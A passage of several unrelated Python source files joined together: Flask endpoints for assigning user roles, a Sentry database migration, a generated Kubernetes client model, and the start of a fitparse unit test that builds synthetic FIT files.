          permission to edit requested user_id
      404:
        description: if user_id doesn't exist
      409:
        description: if any of the given roles are already assigned to the user
    security:
      - ServiceToken: []
      - OAuth2AuthzFlow: []
    """
    user = get_user(user_id, 'edit')
    if not request.json or 'roles' not in request.json:
        abort(400, "Requires role list")
    # BUGFIX: resolve each named role via first() so an unknown name yields
    # the documented 400 rather than an unhandled NoResultFound (HTTP 500).
    role_list = []
    for role in request.json.get('roles'):
        name = role.get('name')
        matched = Role.query.filter_by(name=name).first()
        if matched is None:
            abort(400, "Unknown role requested: {}".format(name))
        role_list.append(matched)
    user.add_roles(role_list, acting_user=current_user())
    db.session.commit()
    # Return user's updated role list
    return jsonify(roles=[r.as_json() for r in user.roles])
@role_api.route('/api/user/<int:user_id>/roles', methods=('DELETE',))
@crossdomain()
@oauth.require_oauth()
def delete_roles(user_id):
    """Delete roles from user, returns simple JSON listing remaining roles
    Used to delete role(s) from a user. See the PUT version for the
    idempotent mechanism to define the complete set of roles for a user.
    If any of the roles given are not currently defined for the user, a 409
    will be raised.
    Only the 'name' field of the roles is referenced. Must match
    current roles in the system.
    Returns a list of all roles associated with user after change.
    ---
    tags:
      - User
      - Role
    operationId: deleteRoles
    produces:
      - application/json
    parameters:
      - name: user_id
        in: path
        description: TrueNTH user ID
        required: true
        type: integer
        format: int64
      - in: body
        name: body
        schema:
          $ref: "#/definitions/nested_roles"
    responses:
      200:
        description:
          Returns a list of all roles user belongs to after change.
        schema:
          $ref: "#/definitions/nested_roles"
      400:
        description: if the request includes an unknown role.
      401:
        description:
          if missing valid OAuth token or if the authorized user lacks
          permission to edit requested user_id
      404:
        description: if user_id doesn't exist
      409:
        description: if any of the given roles are not currently assigned to the user
    security:
      - ServiceToken: []
      - OAuth2AuthzFlow: []
    """
    user = get_user(user_id, 'edit')
    if not request.json or 'roles' not in request.json:
        abort(400, "Requires role list")
    # BUGFIX: resolve each named role via first() so an unknown name yields
    # the documented 400 rather than an unhandled NoResultFound (HTTP 500).
    role_list = []
    for role in request.json.get('roles'):
        name = role.get('name')
        matched = Role.query.filter_by(name=name).first()
        if matched is None:
            abort(400, "Unknown role requested: {}".format(name))
        role_list.append(matched)
    user.delete_roles(role_list, acting_user=current_user())
    db.session.commit()
    # Return user's updated role list
    return jsonify(roles=[r.as_json() for r in user.roles])
@role_api.route('/api/user/<int:user_id>/roles', methods=('PUT',))
@crossdomain()
@oauth.require_oauth()
def set_roles(user_id):
    """Set roles for user, returns simple JSON defining user roles
    Used to set role assignments for a user. Include all roles
    the user should be a member of. If user previously belonged to
    roles not included, the missing roles will be deleted from the user.
    Only the 'name' field of the roles is referenced. Must match
    current roles in the system.
    Returns a list of all roles associated with user after change.
    ---
    tags:
      - User
      - Role
    operationId: setRoles
    produces:
      - application/json
    parameters:
      - name: user_id
        in: path
        description: TrueNTH user ID
        required: true
        type: integer
        format: int64
      - in: body
        name: body
        schema:
          $ref: "#/definitions/nested_roles"
    responses:
      200:
        description:
          Returns a list of all roles user belongs to after change.
        schema:
          $ref: "#/definitions/nested_roles"
      400:
        description: if the request includes an unknown role.
      401:
        description:
          if missing valid OAuth token or if the authorized user lacks
          permission to edit requested user_id
      404:
        description: if user_id doesn't exist
    security:
      - ServiceToken: []
      - OAuth2AuthzFlow: []
    """
    user = get_user(user_id, 'edit')
    if not request.json or 'roles' not in request.json:
        abort(400, "Requires role list")
    # BUGFIX: resolve each named role via first() so an unknown name yields
    # the documented 400 rather than an unhandled NoResultFound (HTTP 500).
    role_list = []
    for role in request.json.get('roles'):
        name = role.get('name')
        matched = Role.query.filter_by(name=name).first()
        if matched is None:
            abort(400, "Unknown role requested: {}".format(name))
        role_list.append(matched)
    user.update_roles(role_list, acting_user=current_user())
    db.session.commit()
    # Return user's updated role list
    return jsonify(roles=[r.as_json() for r in user.roles])
|
|
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
    def forwards(self, orm):
        """Apply the migration: create the sentry_lostpasswordhash table."""
        # Adding model 'LostPasswordHash'
        db.create_table('sentry_lostpasswordhash', (
            ('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
            ('user', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['auth.User'], unique=True)),
            ('hash', self.gf('django.db.models.fields.CharField')(max_length=32)),
            ('date_added', self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime.now)),
        ))
        # Fire post-create signals so South-aware listeners can react.
        db.send_create_signal('sentry', ['LostPasswordHash'])
def backwards(self, orm):
# Deleting model 'LostPasswordHash'
db.delete_table('sentry_lostpasswordhash')
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'sentry.event': {
'Meta': {'unique_together': "(('project', 'event_id'),)", 'object_name': 'Event', 'db_table': "'sentry_message'"},
'checksum': ('django.db.models.fields.CharField', [], {'max_length': '32', 'db_index': 'True'}),
'culprit': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'db_column': "'view'", 'blank': 'True'}),
'data': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'datetime': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'event_id': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True', 'db_column': "'message_id'"}),
'group': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'event_set'", 'null': 'True', 'to': "orm['sentry.Group']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'level': ('django.db.models.fields.PositiveIntegerField', [], {'default': '40', 'db_index': 'True', 'blank': 'True'}),
'logger': ('django.db.models.fields.CharField', [], {'default': "'root'", 'max_length': '64', 'db_index': 'True', 'blank': 'True'}),
'message': ('django.db.models.fields.TextField', [], {}),
'platform': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'server_name': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True', 'db_index': 'True'}),
'site': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True', 'db_index': 'True'}),
'time_spent': ('django.db.models.fields.FloatField', [], {'null': 'True'})
},
'sentry.filterkey': {
'Meta': {'unique_together': "(('project', 'key'),)", 'object_name': 'FilterKey'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sentry.Project']"})
},
'sentry.filtervalue': {
'Meta': {'unique_together': "(('project', 'key', 'value'),)", 'object_name': 'FilterValue'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'value': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
'sentry.group': {
'Meta': {'unique_together': "(('project', 'logger', 'culprit', 'checksum'),)", 'object_name': 'Group', 'db_table': "'sentry_groupedmessage'"},
'active_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'db_index': 'True'}),
'checksum': ('django.db.models.fields.CharField', [], {'max_length': '32', 'db_index': 'True'}),
'culprit': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'db_column': "'view'", 'blank': 'True'}),
'data': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'first_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_public': ('django.db.models.fields.NullBooleanField', [], {'default': 'False', 'null': 'True', 'blank': 'True'}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'level': ('django.db.models.fields.PositiveIntegerField', [], {'default': '40', 'db_index': 'True', 'blank': 'True'}),
'logger': ('django.db.models.fields.CharField', [], {'default': "'root'", 'max_length': '64', 'db_index': 'True', 'blank': 'True'}),
'message': ('django.db.models.fields.TextField', [], {}),
'platform': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'resolved_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'db_index': 'True'}),
'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'status': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0', 'db_index': 'True'}),
'time_spent_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'time_spent_total': ('django.db.models.fields.FloatField', [], {'default': '0'}),
'times_seen': ('django.db.models.fields.PositiveIntegerField', [], {'default': '1', 'db_index': 'True'})
},
'sentry.groupbookmark': {
'Meta': {'unique_together': "(('project', 'user', 'group'),)", 'object_name': 'GroupBookmark'},
'group': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'bookmark_set'", 'to': "orm['sentry.Group']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'bookmark_set'", 'to': "orm['sentry.Project']"}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'sentry_bookmark_set'", 'to': "orm['auth.User']"})
},
'sentry.groupmeta': {
'Meta': {'unique_together': "(('group', 'key'),)", 'object_name': 'GroupMeta'},
'group': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sentry.Group']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'value': ('django.db.models.fields.TextField', [], {})
},
'sentry.lostpasswordhash': {
'Meta': {'object_name': 'LostPasswordHash'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'hash': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'unique': 'True'})
},
'sentry.messagecountbyminute': {
'Meta': {'unique_together': "(('project', 'group', 'date'),)", 'object_name': 'MessageCountByMinute'},
'date': ('django.db.models.fields.DateTimeField', [], {'db_index': 'True'}),
'group': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sentry.Group']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'time_spent_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'time_spent_total': ('django.db.models.fields.FloatField', [], {'default': '0'}),
'times_seen': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'})
},
'sentry.messagefiltervalue': {
'Meta': {'unique_together': "(('project', 'key', 'value', 'group'),)", 'object_name': 'MessageFilterValue'},
'first_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True', 'db_index': 'True'}),
'group': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sentry.Group']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True', 'db_index': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'times_seen': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'value': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
'sentry.messageindex': {
'Meta': {'unique_together': "(('column', 'value', 'object_id'),)", 'object_name': 'MessageIndex'},
'column': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'object_id': ('django.db.models.fields.PositiveIntegerField', [], {}),
'value': ('django.db.models.fields.CharField', [], {'max_length': '128'})
},
'sentry.option': {
'Meta': {'object_name': 'Option'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '64'}),
'value': ('picklefield.fields.PickledObjectField', [], {})
},
'sentry.pendingteammember': {
'Meta': {'unique_together': "(('team', 'email'),)", 'object_name': 'PendingTeamMember'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'team': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'pending_member_set'", 'to': "orm['sentry.Team']"}),
'type': ('django.db.models.fields.IntegerField', [], {'default': '0'})
},
'sentry.project': {
'Meta': {'object_name': 'Project'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'owner': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'sentry_owned_project_set'", 'null': 'True', 'to': "orm['auth.User']"}),
'public': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '50', 'unique': 'True', 'null': 'True'}),
'status': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0', 'db_index': 'True'}),
'team': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sentry.Team']", 'null': 'True'})
},
'sentry.projectcountbyminute': {
'Meta': {'unique_together': "(('project', 'date'),)", 'object_name': 'ProjectCountByMinute'},
'date': ('django.db.models.fields.DateTimeField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'time_spent_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'time_spent_total': ('django.db.models.fields.FloatField', [], {'default': '0'}),
'times_seen': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'})
},
'sentry.projectkey': {
'Meta': {'object_name': 'ProjectKey'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'key_set'", 'to': "orm['sentry.Project']"}),
'public_key': ('django.db.models.fields.CharField', [], {'max_length': '32', 'unique': 'True', 'null': 'True'}),
'secret_key': ('django.db.models.fields.CharField', [], {'max_length': '32', 'unique': 'True', 'null': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'null': 'True'}),
'user_added': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'keys_added_set'", 'null': 'True', 'to': "orm['auth.User']"})
},
'sentry.projectoption': {
'Meta': {'unique_together': "(('project', 'key'),)", 'object_name': 'ProjectOption', 'db_table': "'sentry_projectoptions'"},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sentry.Project']"}),
'value': ('picklefield.fields.PickledObjectField', [], {})
},
'sentry.searchdocument': {
'Meta': {'unique_together': "(('project', 'group'),)", 'object_name': 'SearchDocument'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'date_changed': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'group': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sentry.Group']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sentry.Project']"}),
'status': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'total_events': ('django.db.models.fields.PositiveIntegerField', [], {'default': '1'})
},
'sentry.searchtoken': {
'Meta': {'unique_together': "(('document', 'field', 'token'),)", 'object_name': 'SearchToken'},
'document': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'token_set'", 'to': "orm['sentry.SearchDocument']"}),
'field': ('django.db.models.fields.CharField', [], {'default': "'text'", 'max_length': '64'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'times_seen': ('django.db.models.fields.PositiveIntegerField', [], {'default': '1'}),
'token': ('django.db.models.fields.CharField', [], {'max_length': '128'})
},
'sentry.team': {
'Meta': {'object_name': 'Team'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'owner': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '50'})
},
'sentry.teammember': {
'Meta': {'unique_together': "(('team', 'user'),)", 'object_name': 'TeamMember'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'team': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'member_set'", 'to': "orm['sentry.Team']"}),
'type': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'sentry_teammember_set'", 'to': "orm['auth.User']"})
},
'sentry.useroption': {
'Meta': {'unique_together': "(('user', 'project', 'key'),)", 'object_name': 'UserOption'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"}),
'value': ('picklefield.fields.PickledObjectField', [], {})
}
}
complete_apps = ['sentry']
|
|
# coding: utf-8
"""
Kubernetes
No description provided (generated by Openapi Generator https://github.com/openapitools/openapi-generator) # noqa: E501
The version of the OpenAPI document: release-1.23
Generated by: https://openapi-generator.tech
"""
import pprint
import re # noqa: F401
import six
from kubernetes.client.configuration import Configuration
class DiscoveryV1EndpointPort(object):
    """NOTE: This class is auto generated by OpenAPI Generator.
    Ref: https://openapi-generator.tech

    Do not edit the class manually.
    """

    """
    Attributes:
      openapi_types (dict): The key is attribute name
                            and the value is attribute type.
      attribute_map (dict): The key is attribute name
                            and the value is json key in definition.
    """
    # Maps each model attribute to its OpenAPI type (used by to_dict/serializers).
    openapi_types = {
        'app_protocol': 'str',
        'name': 'str',
        'port': 'int',
        'protocol': 'str'
    }

    # Maps each snake_case attribute to its camelCase JSON key.
    attribute_map = {
        'app_protocol': 'appProtocol',
        'name': 'name',
        'port': 'port',
        'protocol': 'protocol'
    }

    def __init__(self, app_protocol=None, name=None, port=None, protocol=None, local_vars_configuration=None):  # noqa: E501
        """DiscoveryV1EndpointPort - a model defined in OpenAPI"""  # noqa: E501
        if local_vars_configuration is None:
            local_vars_configuration = Configuration()
        self.local_vars_configuration = local_vars_configuration

        self._app_protocol = None
        self._name = None
        self._port = None
        self._protocol = None
        self.discriminator = None

        # Only assign through the property setters when a value was supplied,
        # so unset fields remain None and are distinguishable from explicit values.
        if app_protocol is not None:
            self.app_protocol = app_protocol
        if name is not None:
            self.name = name
        if port is not None:
            self.port = port
        if protocol is not None:
            self.protocol = protocol

    @property
    def app_protocol(self):
        """Gets the app_protocol of this DiscoveryV1EndpointPort.  # noqa: E501

        The application protocol for this port. This field follows standard Kubernetes label syntax. Un-prefixed names are reserved for IANA standard service names (as per RFC-6335 and http://www.iana.org/assignments/service-names). Non-standard protocols should use prefixed names such as mycompany.com/my-custom-protocol.  # noqa: E501

        :return: The app_protocol of this DiscoveryV1EndpointPort.  # noqa: E501
        :rtype: str
        """
        return self._app_protocol

    @app_protocol.setter
    def app_protocol(self, app_protocol):
        """Sets the app_protocol of this DiscoveryV1EndpointPort.

        The application protocol for this port. This field follows standard Kubernetes label syntax. Un-prefixed names are reserved for IANA standard service names (as per RFC-6335 and http://www.iana.org/assignments/service-names). Non-standard protocols should use prefixed names such as mycompany.com/my-custom-protocol.  # noqa: E501

        :param app_protocol: The app_protocol of this DiscoveryV1EndpointPort.  # noqa: E501
        :type: str
        """

        self._app_protocol = app_protocol

    @property
    def name(self):
        """Gets the name of this DiscoveryV1EndpointPort.  # noqa: E501

        The name of this port. All ports in an EndpointSlice must have a unique name. If the EndpointSlice is derived from a Kubernetes service, this corresponds to the Service.ports[].name. Name must either be an empty string or pass DNS_LABEL validation: * must be no more than 63 characters long. * must consist of lower case alphanumeric characters or '-'. * must start and end with an alphanumeric character. Default is empty string.  # noqa: E501

        :return: The name of this DiscoveryV1EndpointPort.  # noqa: E501
        :rtype: str
        """
        return self._name

    @name.setter
    def name(self, name):
        """Sets the name of this DiscoveryV1EndpointPort.

        The name of this port. All ports in an EndpointSlice must have a unique name. If the EndpointSlice is derived from a Kubernetes service, this corresponds to the Service.ports[].name. Name must either be an empty string or pass DNS_LABEL validation: * must be no more than 63 characters long. * must consist of lower case alphanumeric characters or '-'. * must start and end with an alphanumeric character. Default is empty string.  # noqa: E501

        :param name: The name of this DiscoveryV1EndpointPort.  # noqa: E501
        :type: str
        """

        self._name = name

    @property
    def port(self):
        """Gets the port of this DiscoveryV1EndpointPort.  # noqa: E501

        The port number of the endpoint. If this is not specified, ports are not restricted and must be interpreted in the context of the specific consumer.  # noqa: E501

        :return: The port of this DiscoveryV1EndpointPort.  # noqa: E501
        :rtype: int
        """
        return self._port

    @port.setter
    def port(self, port):
        """Sets the port of this DiscoveryV1EndpointPort.

        The port number of the endpoint. If this is not specified, ports are not restricted and must be interpreted in the context of the specific consumer.  # noqa: E501

        :param port: The port of this DiscoveryV1EndpointPort.  # noqa: E501
        :type: int
        """

        self._port = port

    @property
    def protocol(self):
        """Gets the protocol of this DiscoveryV1EndpointPort.  # noqa: E501

        The IP protocol for this port. Must be UDP, TCP, or SCTP. Default is TCP.  # noqa: E501

        :return: The protocol of this DiscoveryV1EndpointPort.  # noqa: E501
        :rtype: str
        """
        return self._protocol

    @protocol.setter
    def protocol(self, protocol):
        """Sets the protocol of this DiscoveryV1EndpointPort.

        The IP protocol for this port. Must be UDP, TCP, or SCTP. Default is TCP.  # noqa: E501

        :param protocol: The protocol of this DiscoveryV1EndpointPort.  # noqa: E501
        :type: str
        """

        self._protocol = protocol

    def to_dict(self):
        """Returns the model properties as a dict"""
        result = {}

        # Recursively convert nested models (anything exposing to_dict),
        # lists of models, and dicts of models into plain Python values.
        for attr, _ in six.iteritems(self.openapi_types):
            value = getattr(self, attr)
            if isinstance(value, list):
                result[attr] = list(map(
                    lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
                    value
                ))
            elif hasattr(value, "to_dict"):
                result[attr] = value.to_dict()
            elif isinstance(value, dict):
                result[attr] = dict(map(
                    lambda item: (item[0], item[1].to_dict())
                    if hasattr(item[1], "to_dict") else item,
                    value.items()
                ))
            else:
                result[attr] = value

        return result

    def to_str(self):
        """Returns the string representation of the model"""
        return pprint.pformat(self.to_dict())

    def __repr__(self):
        """For `print` and `pprint`"""
        return self.to_str()

    def __eq__(self, other):
        """Returns true if both objects are equal"""
        if not isinstance(other, DiscoveryV1EndpointPort):
            return False

        return self.to_dict() == other.to_dict()

    def __ne__(self, other):
        """Returns true if both objects are not equal"""
        if not isinstance(other, DiscoveryV1EndpointPort):
            return True

        return self.to_dict() != other.to_dict()
|
|
#!/usr/bin/env python
import csv
import datetime
import os
from struct import pack
import sys
import warnings
from fitparse import FitFile
from fitparse.processors import UTC_REFERENCE, StandardUnitsDataProcessor
from fitparse.records import BASE_TYPES, Crc
from fitparse.utils import FitEOFError, FitCRCError, FitHeaderError, FitParseError
if sys.version_info >= (2, 7):
import unittest
else:
import unittest2 as unittest
def generate_messages(mesg_num, local_mesg_num, field_defs, endian='<', data=None):
    """Build raw bytes for one FIT definition message plus optional data messages.

    field_defs is a sequence of (field_def_num, base_type_name) pairs; data,
    if given, is a sequence of value rows matching field_defs. Returns the
    concatenated message bytes.
    """
    chunks = []
    resolved_types = []
    # Definition record header: bit 6 set marks a definition message.
    definition = pack('<B', 0x40 | local_mesg_num)
    # Reserved byte followed by the architecture flag (1 == big endian).
    definition += pack('<xB', int(endian == '>'))
    # Global message number and the count of field definitions that follow.
    definition += pack('%sHB' % endian, mesg_num, len(field_defs))
    for field_def_num, type_name in field_defs:
        resolved = [bt for bt in BASE_TYPES.values() if bt.name == type_name][0]
        resolved_types.append(resolved)
        definition += pack('<3B', field_def_num, resolved.size, resolved.identifier)
    chunks.append(definition)
    if data:
        for row in data:
            record = pack('B', local_mesg_num)
            for value, base_type in zip(row, resolved_types):
                record += pack("%s%s" % (endian, base_type.fmt), value)
            chunks.append(record)
    return b''.join(chunks)
def generate_fitfile(data=None, endian='<'):
    """Assemble a minimal, CRC-correct FIT file containing a file_id message.

    Extra pre-built message bytes may be appended via ``data``.
    """
    body = generate_messages(
        # local mesg 0, global mesg 0 (file_id)
        mesg_num=0, local_mesg_num=0, endian=endian, field_defs=[
            # serial number, time_created, manufacturer
            (3, 'uint32z'), (4, 'uint32'), (1, 'uint16'),
            # product/garmin_product, number, type
            (2, 'uint16'), (5, 'uint16'), (0, 'enum'),
        ],
        # random serial number, random time, garmin, edge500, null, activity
        data=[[558069241, 723842606, 1, 1036, (2 ** 16) - 1, 4]],
    )
    if data:
        body += data
    # 14-byte header: protocol version 1.0, profile version 1.52,
    # data size, and the '.FIT' magic.
    header = pack('<2BHI4s', 14, 16, 152, len(body), b'.FIT')
    with_header_crc = header + pack('<' + Crc.FMT, Crc.calculate(header)) + body
    # Trailing CRC covers everything written so far.
    return with_header_crc + pack('<' + Crc.FMT, Crc.calculate(with_header_crc))
def secs_to_dt(secs):
    """Convert a FIT timestamp (seconds since the FIT epoch) to a naive UTC datetime."""
    unix_secs = secs + UTC_REFERENCE
    return datetime.datetime.utcfromtimestamp(unix_secs)
def testfile(filename):
return os.path.join(os.path.dirname(os.path.realpath(__file__)), 'files', filename)
class FitFileTestCase(unittest.TestCase):
def test_basic_file_with_one_record(self, endian='<'):
    """Parse a generated single-record file and verify every file_id field."""
    fitfile = FitFile(generate_fitfile(endian=endian))
    fitfile.parse()
    self.assertEqual(fitfile.profile_version, 1.52)
    self.assertEqual(fitfile.protocol_version, 1.0)
    file_id = fitfile.messages[0]
    self.assertEqual(file_id.name, 'file_id')
    # Every field must be reachable both by name and by field definition number.
    for key in ('type', 0):
        self.assertEqual(file_id.get_value(key), 'activity')
        self.assertEqual(file_id.get(key).raw_value, 4)
    for key in ('manufacturer', 1):
        self.assertEqual(file_id.get_value(key), 'garmin')
        self.assertEqual(file_id.get(key).raw_value, 1)
    for key in ('product', 'garmin_product', 2):
        self.assertEqual(file_id.get_value(key), 'edge500')
        self.assertEqual(file_id.get(key).raw_value, 1036)
    for key in ('serial_number', 3):
        self.assertEqual(file_id.get_value(key), 558069241)
    for key in ('time_created', 4):
